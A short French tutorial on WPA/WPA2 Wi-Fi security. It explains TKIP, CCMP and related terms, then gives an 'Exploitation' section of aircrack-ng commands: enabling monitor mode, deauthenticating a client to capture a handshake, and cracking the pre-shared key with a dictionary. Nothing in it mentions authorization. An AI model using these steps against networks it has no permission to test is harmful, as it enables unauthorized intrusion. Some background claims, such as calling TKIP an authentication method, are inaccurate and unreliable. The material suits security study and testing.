**WPA**
Wi-Fi Protected Access (WPA et WPA2) est un mécanisme pour sécuriser les réseaux sans-fil de type Wi-Fi.
Le WPA était une norme temporaire pour palier au manque de sécurité du WEP. La norme a été implémentée dans l'idée d'être remplacée rapidement par le WPA2.
Elle utilise deux types d'authentifications :
- TKIP (Temporal Key Integrity Protocol) : une clé de 128 bits est utilisée pour chaque paquet. On génère une nouvelle clé pour chaque paquet.
- CCMP : un mécanisme de chiffrement qui s'appuie sur AES et qui est plus robuste que le TKIP.
__Vocabulaire utilisé :__
- BSSID : est l'adresse mac du point d'accès wifi.
- ESSID : est le nom du réseau wifi (exemple: Bbox-AFXXX)
- Handshake : est un échange de clé entre un routeur wifi et un client.
- Channel : est le canal sur lequel est diffusé le réseau wifi.
Sur les réseaux des particuliers le WPA-PSK est utilisé (Preshared key).
LE WPA-PSK utilise le TKIP comme authentification.
__Exploitation__
Pour commencer, assurez vous que votre carte wifi supporte le monitoring.
Pour l'activer :
airmon-ng start wlan0
Dans mon cas wlan0 est mon interface wifi.
Nous allons ensuite lister les wifi en WPA :
airodump-ng --encrypt wpa mon0
--encrypt permet de filtrer les réseaux wifi par chiffrement
mon0 est notre interface de monitoring
Pour obtenir un station :
airodump-ng -a -c [chan] --bssid [APmac] -w [outfile][iface]
Dès qu'une station apparait :
aireplay-ng -0 1 -e [ESSID] -a [BSSID] -c [Client MAC] [iface]
augmenter le 1 si ça n'a pas suffit à obtenir un handshake.
Pour vérifier si le handshake est capturé ,lancez
aircrack-ng outfile.cap
__pour obtenir la clé :__
aircrack -w dictionnaire -b [bssid] outfile.cap